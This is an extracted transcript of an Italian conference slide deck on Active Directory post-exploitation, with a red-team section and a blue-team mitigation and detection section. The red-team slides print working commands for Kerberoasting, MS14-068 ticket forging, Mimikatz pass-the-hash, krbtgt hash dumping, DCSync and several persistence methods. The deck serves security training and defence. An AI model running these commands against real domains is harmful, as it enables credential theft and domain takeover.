the dark side of active directory - copia · 2015-12-02 · the dark side of active directory ......
TRANSCRIPT
presenta
The Dark Side of Active DirectoryPost-Exploitation like a boss without exploit
Guglielmo Guglielmo Guglielmo Guglielmo ScaiolaScaiolaScaiolaScaiolaMCSE MCSE MCSE MCSE –––– CEI CEI CEI CEI –––– CEH CEH CEH CEH –––– CHFI CHFI CHFI CHFI –––– ECSA ECSA ECSA ECSA ---- ISO 27001 L.A. ISO 27001 L.A. ISO 27001 L.A. ISO 27001 L.A. –––– Security +Security +Security +Security +
[email protected] [email protected] [email protected] [email protected] @@@@SoftwarGSSoftwarGSSoftwarGSSoftwarGS
Guglielmo «S0ftwar» Scaiola
@S0ftwarGS
Security Consultant & Ethical Hacker
Microsoft System Engineer – A.D. expert
Trainer & Speaker
Some MC* & other certification…
Computer addicted for fun and profit….☺
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 2
Agenda
• ConsiderazioniConsiderazioniConsiderazioniConsiderazioni inizialiinizialiinizialiiniziali�Perchè?Perchè?Perchè?Perchè?�UnUnUnUn po’po’po’po’ didididi statistichestatistichestatistichestatistiche............�LeLeLeLe basibasibasibasi
• IlIlIlIl latolatolatolato oscurooscurooscurooscuro delladelladelladella forzaforzaforzaforza :::: RedRedRedRed TeamTeamTeamTeam• MitigazioneMitigazioneMitigazioneMitigazione eeee detectiondetectiondetectiondetection :::: BlueBlueBlueBlue TeamTeamTeamTeam• QQQQ &&&& AAAA
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 3
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 4
Enterprise A.D.
Blue or Red?Pink...
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 5
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 6
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 7
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 8
Il lato oscuro della Forza :Red Team
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 9
• Recon (Scanning & Enumeration)
• Gaining Access
• Maintaining Access� Privilege escalation� Backdoor� Movimenti laterali
� Recon (Scanning & Enumeration)� Gaining Access
� Pivoting� Recon (Scanning & Enumeration)� Gaining Access
• Covering Tracks
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 10
How to gain access?
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 11
RAT remote access tools
• Delivery
• Staging e C2 (Multi protocol HTTP, HTTPS, DNS, SMB,...)
• Anti-forensics
• Bypass AV,firewall, log e IDS/IPS
• Survive to proxy – proxy awareness (detect & utilize proxies)
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 12
Old School Vs. New School
• Old School � Exploit to gain access from external (Metasploit or other exploit)� Shell / reverse shell� Tunnel� AV evasion
• New School� Exploit to gain access from external (RAT) + C2� Tools da Sysadmin � Powershell (no AV detection)
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 13
Recon
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 14
Recon
• Users� Dsquery users� Net user
• Computers� Dsquery computer
• Domain Controllers� Dsquery server
• Password Policy� net accounts� Get-ADDefaultDomainPasswordPolicy -Identity MyDomain.local
• Group Membership (Administrators,Domain Admins,...)� Dsquery group� Net localgroup� Net group
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 15
Il lato oscuro della forza
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 16
Warm-Up : Rename Administrator account?
• Psgetsid
• Net localgroup administrators
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 17
DSRM Password
• Chi ricorda la password del DSRM?Chi ricorda la password del DSRM?Chi ricorda la password del DSRM?Chi ricorda la password del DSRM?
• Facile o difficile? (può essere indovinata?)Facile o difficile? (può essere indovinata?)Facile o difficile? (può essere indovinata?)Facile o difficile? (può essere indovinata?)
• Reboot Reboot Reboot Reboot del serverdel serverdel serverdel server. + Accesso fisico (o ILO) . + Accesso fisico (o ILO) . + Accesso fisico (o ILO) . + Accesso fisico (o ILO)
• Quindi è improbabile che qualcuno ne possa Quindi è improbabile che qualcuno ne possa Quindi è improbabile che qualcuno ne possa Quindi è improbabile che qualcuno ne possa abusare, vero?abusare, vero?abusare, vero?abusare, vero?
• Quando la usate? ...e cosa succede se non è Quando la usate? ...e cosa succede se non è Quando la usate? ...e cosa succede se non è Quando la usate? ...e cosa succede se non è quella che vi aspettavate? (cosa succede se la quella che vi aspettavate? (cosa succede se la quella che vi aspettavate? (cosa succede se la quella che vi aspettavate? (cosa succede se la resetta un attaccante?)resetta un attaccante?)resetta un attaccante?)resetta un attaccante?)
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 18
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 19
Real World Enterprise
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 20
Privilege Escalation
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 21
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it
SPN
setspn setspn setspn setspn ----s http/srv2k12r2.2k12.lan websvcs http/srv2k12r2.2k12.lan websvcs http/srv2k12r2.2k12.lan websvcs http/srv2k12r2.2k12.lan websvc
SPN PurposeSPN PurposeSPN PurposeSPN PurposeA service principal name (SPN) is the name by which a Kerberos client uniquely identifies an instance of a service for a given Kerberos target computer.
SPN FormatSPN FormatSPN FormatSPN Formatserviceclassserviceclassserviceclassserviceclass////hosthosthosthost::::portportportport servicenameservicenameservicenameservicenameserviceclass and host are required, but port andservice name are optional. The colon between host and port is only required when aportis present.
22
Users o Computers?
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 23
Requesting tickets (slide stolen to @timmedin ☺)
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 24
L’attacco...(no demo...)
• Find service accounts� Setspn –T domainname –F –Q */*� In alternativa : C:\Tools\kerberoast-master\GetUserSPNs.ps1
• Identify user accounts, ignore computer accounts� GetUserSPNs.ps1 estrae direttamente gli users
• Request tickets (powershell)� Add-Type –AssemblyName System.IdentityModel� New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
–ArgumentList "http/srv2k12r2.2k12.lan"
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 25
L’attacco...(2) (https://github.com/nidem/kerberoast)
• Request Ticket(s)Request Ticket(s)Request Ticket(s)Request Ticket(s)
• One ticket:PS C:> Add-Type -AssemblyName System.IdentityModelPS C:> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
• All the tickets PS C:> Add-Type -AssemblyName
System.IdentityModelPS C:> setspn.exe -T medin.local -Q / | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
• Extract the acquired tickets from ram with MimikatzExtract the acquired tickets from ram with MimikatzExtract the acquired tickets from ram with MimikatzExtract the acquired tickets from ram with Mimikatz
• mimikatz # kerberos::list /export
• Crack with rgsrepcrackCrack with rgsrepcrackCrack with rgsrepcrackCrack with rgsrepcrack
• ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
• RewriteRewriteRewriteRewrite
• Make user appear to be a different user./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
• Add user to another group (in this case Domain Admin)./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
• Inject back into RAM with MimikatzInject back into RAM with MimikatzInject back into RAM with MimikatzInject back into RAM with Mimikatz
• kerberos::ptt sql.kirbiwww.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 26
Gestione delle password degli admin locali via GPP
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 27
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it
• The security update addresses the vulnerability by removing the ability to configure and distribute passwords that use certain Group Policy preferences extensions
Gain local admin privs via GPP
https://technet.microsoft.com/library/security/ms14-02528
Privilege escalation –local - GPP
Ms14-068
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 30
Ms14-068kekeo
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 31
If fail :runas /noprofile /netonly /user:idontcare cmdms14068.exe /domain:child1.newtest.lab /user:ut001 /password:Ut1Passw0rd /ptt
Persistence
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 32
DSRM Password
• https://technet.microsoft.com/it-it/library/cc754363(v=ws.10).aspx
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 33
DSRM Password
• https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx
• HKLMHKLMHKLMHKLM\\\\SystemSystemSystemSystem\\\\CurrentControlSetCurrentControlSetCurrentControlSetCurrentControlSet\\\\ControlControlControlControl\\\\LsaLsaLsaLsa\\\\DSRMAdminLogonBehaviorDSRMAdminLogonBehaviorDSRMAdminLogonBehaviorDSRMAdminLogonBehavior
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 34
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 35
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 36
• Mimikatz (su DC)
• Token::elevate
• Lsadump::sam
• DA EXT
• Mimikatz “privilege::debug” “sekurlsa::pth /domain:ADSDC03 /user:Administrator /ntlm:7c08d63a2f48f045971bc2236ed3f3ac” exit
DSRM Password
Mimikatz –dump cleartext password
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 37
Dump password hash
Dump password with mimikatz
lsadump::lsa /inject /name:krbtgt
lsadump::lsa
lsadump::lsa /patch
lsadump::lsa
lsadump::lsa /patch
DCSync
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 40
DCSync:1) Discovery DC2) Query replicate the user cred via GetNCChange
Intermezzo
Mimikatz –pass-the-hash
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 41
42
Mimikatz – over-pass-the-hash
• From AD online – mimikatz• lsadump::lsa /inject /name:administrator
• From NTDS.DIT e System hive Offline • NTDSXtract
• From client LSASS memory – mimikatz• sekurlsa::ekeys
mimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exitmimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exitmimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exitmimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exit
Silver ticket
• È un TGS
• Il vantaggio è che non c’è comunicazione col DC quando lo si usa
• Non «piace» perchè la password dell’account computer cambia ogni 30 giorni
• While a Golden ticket is encrypted/signed with the domain Kerberos service account (KRBTGT), a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer ’s local SAM or service account credential).
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 43
Mimikatz –silver ticket e DC
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 44
Mimikatz –Golden Ticket
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 45
ADMT & SID History
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 46
Active Directory Persistence : SID History
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 47
Real World Enterprise
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 48
Skeleton key
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 49
AdminSDHolder
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 50
AdminSDHolder
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 51
Malicious Security Provider
• HKLM\System\CurrentControlSet\Control\Lsa\Security Packages
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 52
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 53
Mitigazione e Detection :Blue Team
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 54
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 55
Destinati alla sconfitta?• Gli attacchi sono cambiati:
� Non più l’evento in sè è malevolo (il «come»)� E’ malevola la correlazione :
� Chi ha fatto questa cosa?
� Da che host è stata fatta?
� Quando?
• Mitigare e loggare/correlare
• Ogni attacco che abbiamo visto nelle due sessioni lascia una traccia nei log.
• Dobbiamo implementare sistemi che alzino alert alla presenza di un certo evento o di un certo numero di eventi e che eventualmente li correlino (SIEM?)
E’ finito il tempo di security = AV + firewall
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 56
Lavorare insieme...
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it
• Thinking an Active Directory domain is the security Thinking an Active Directory domain is the security Thinking an Active Directory domain is the security Thinking an Active Directory domain is the security boundaryboundaryboundaryboundary
• Deploying systems with default settingsDeploying systems with default settingsDeploying systems with default settingsDeploying systems with default settings....
• Too many Domain Too many Domain Too many Domain Too many Domain AdminsAdminsAdminsAdmins
• Not tracking/monitoring/documenting delegated access to Active Not tracking/monitoring/documenting delegated access to Active Not tracking/monitoring/documenting delegated access to Active Not tracking/monitoring/documenting delegated access to Active DirectoryDirectoryDirectoryDirectory
• OverOverOverOver----permissioned Service permissioned Service permissioned Service permissioned Service AccountsAccountsAccountsAccounts
• Service Accounts with passwords less than 20 Service Accounts with passwords less than 20 Service Accounts with passwords less than 20 Service Accounts with passwords less than 20 characterscharacterscharacterscharacters
• Using Group Policy Preferences to manage Using Group Policy Preferences to manage Using Group Policy Preferences to manage Using Group Policy Preferences to manage credentialscredentialscredentialscredentials
• Running nonRunning nonRunning nonRunning non----essential roles and services on Domain essential roles and services on Domain essential roles and services on Domain essential roles and services on Domain ControllersControllersControllersControllers
• Domain Controllers not patched Domain Controllers not patched Domain Controllers not patched Domain Controllers not patched promptly & promptly & promptly & promptly & Unpatched systems (Unpatched systems (Unpatched systems (Unpatched systems (srv srv srv srv & & & & wks)wks)wks)wks)
• Domain Controllers not running a “recent” OS Domain Controllers not running a “recent” OS Domain Controllers not running a “recent” OS Domain Controllers not running a “recent” OS versionversionversionversion
• The same local Administrator account passwords on multiple The same local Administrator account passwords on multiple The same local Administrator account passwords on multiple The same local Administrator account passwords on multiple computerscomputerscomputerscomputers
• Active Directory Admins logging on to untrusted Active Directory Admins logging on to untrusted Active Directory Admins logging on to untrusted Active Directory Admins logging on to untrusted systemssystemssystemssystems
• Not monitoring admin group Not monitoring admin group Not monitoring admin group Not monitoring admin group membershipmembershipmembershipmembership
• Not cleaning up admin group membershipNot cleaning up admin group membershipNot cleaning up admin group membershipNot cleaning up admin group membership
• Not automatically removing inactive (stale) user and computer accountsNot automatically removing inactive (stale) user and computer accountsNot automatically removing inactive (stale) user and computer accountsNot automatically removing inactive (stale) user and computer accounts
• Keeping Keeping Keeping Keeping legacy authentication active on the network (LM/NTLMv1legacy authentication active on the network (LM/NTLMv1legacy authentication active on the network (LM/NTLMv1legacy authentication active on the network (LM/NTLMv1))))
• Being too trusting Being too trusting Being too trusting Being too trusting –––– Too many Trusts or Trusts without proper security Too many Trusts or Trusts without proper security Too many Trusts or Trusts without proper security Too many Trusts or Trusts without proper security controlscontrolscontrolscontrols
The Most Common Active Directory Security Issues and What You Can Do to Fix Them by Sean Metcalf
https://adsecurity.org/?p=168457
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 58
• Controllo accesso amministrativo, anche per pochi minuti (chi?quando?perchè? Loggo cosa fa?)
• Service account a basso privilegio e con password complesse
• Accesso amministrativo a A.D. solo da alcuni client sicuri, no accessi amministrativi da altri client
• No privilegi di amministratore locale agli utenti
• «Igiene» del Token
• Considerare il Dominio e non la Foresta come perimetro di sicurezza
• No stessa password di amministratore locale su più host
• Si UAC
• No powershell dove non serve
• No password in GPP/GPO, batch, file, etc...
• No S.O. Legacy (per quanto possibile in produzione)
• Patch del S.O. E delle applicazioni (soprattutto lato client)
Decalogo...all’italiana
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 59
• DSRM Password� Id 4729 – set DSRM administrator password� Monitorare la chiave HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
• DC Sync � Creare una allow list degli IP dei DC e monitorare DsGetNCChange da IP non nella lista
• Malicious Security Support Provider� Monitorare la chiave HKLM\System\CurrentControlSet\Control\Lsa\SecurityPackages
• SID History� Monitorare chi ha l’attributo settato e le sue eventuali modifiche
• AdminSDHolder� Monitorare le ACL dell’oggetto AdminSDHolder� Monitorare utenti e gruppi con AdminCount=1
• Golden/Silver Ticket – MS14-068� Event ID 4624 (account logon)-4672(admin Logon)-4634(account logoff ) possono contenere il
campo account domain con FQDN e non con lo short name oppure averlo blank (o con stringhe caratteristiche) PER ORA!!!PER ORA!!!PER ORA!!!PER ORA!!!
Detection
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 60
Microsoft Advanced Threat Analytics
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 61
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 62
• https://adsecurity.org
• http://blog.harmj0y.net/
• http://blog.gentilkiwi.com/mimikatz (meglio seguirlo su twitter)
• http://www.powershellempire.com
• http://www.labofapenetrationtester.com/
• Ma soprattutto Twitter, Twitter e Twitter...
Il segreto : la conoscenza – il nemico : l’ignoranza
Q & A
Domande e RisposteDomande e RisposteDomande e RisposteDomande e Risposte
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 63
Corsi consigliati
OEC217 - PenTesting Techniques
EC001 - EC-Council Ethical Hacking & Countermeasures – CEH
OEC208 - Security for Network & System Administrators
Per il futuro : corso di 2-3 giornate su security Active Directory
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 64
Tnx to :
• Passingthehash Passingthehash Passingthehash Passingthehash ---- @@@@passingthehashpassingthehashpassingthehashpassingthehash
• Joe Bialek Joe Bialek Joe Bialek Joe Bialek ---- @JosephBialek@JosephBialek@JosephBialek@JosephBialek
• Sylvain Sylvain Sylvain Sylvain Monné Monné Monné Monné ---- @@@@BiDOrDBiDOrDBiDOrDBiDOrD
• Chris Chris Chris Chris Gates Gates Gates Gates ---- @carnal0wnage@carnal0wnage@carnal0wnage@carnal0wnage
• Matt NMatt NMatt NMatt N. . . . ---- @enigma0x3@enigma0x3@enigma0x3@enigma0x3
• Will Schroeder Will Schroeder Will Schroeder Will Schroeder ---- @harmj0y@harmj0y@harmj0y@harmj0y
• Justin Warner Justin Warner Justin Warner Justin Warner ---- @sixdub@sixdub@sixdub@sixdub
in particolare a Benjamin Delpy in particolare a Benjamin Delpy in particolare a Benjamin Delpy in particolare a Benjamin Delpy ---- @gentilkiwi per il suo supporto e @gentilkiwi per il suo supporto e @gentilkiwi per il suo supporto e @gentilkiwi per il suo supporto e a a a a Sean Metcalf Sean Metcalf Sean Metcalf Sean Metcalf ---- @@@@PyroTek3 per tutto il materiale da lui messo a PyroTek3 per tutto il materiale da lui messo a PyroTek3 per tutto il materiale da lui messo a PyroTek3 per tutto il materiale da lui messo a disposizionedisposizionedisposizionedisposizione
Stay Tuned... : @S0ftwarGS@S0ftwarGS@[email protected] – [email protected] - +39 02 365738.11 - #wpc15it 65
Contatti OverNetEducation
OverNetOverNetOverNetOverNet EducationEducationEducationEducationinfo@overneteducation.itwww.overneteducation.itTel. 02 365738
@overnetewww.facebook.com/OverNetEducationwww.linkedin.com/company/overnet-solutionswww.wpc2015.it
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 66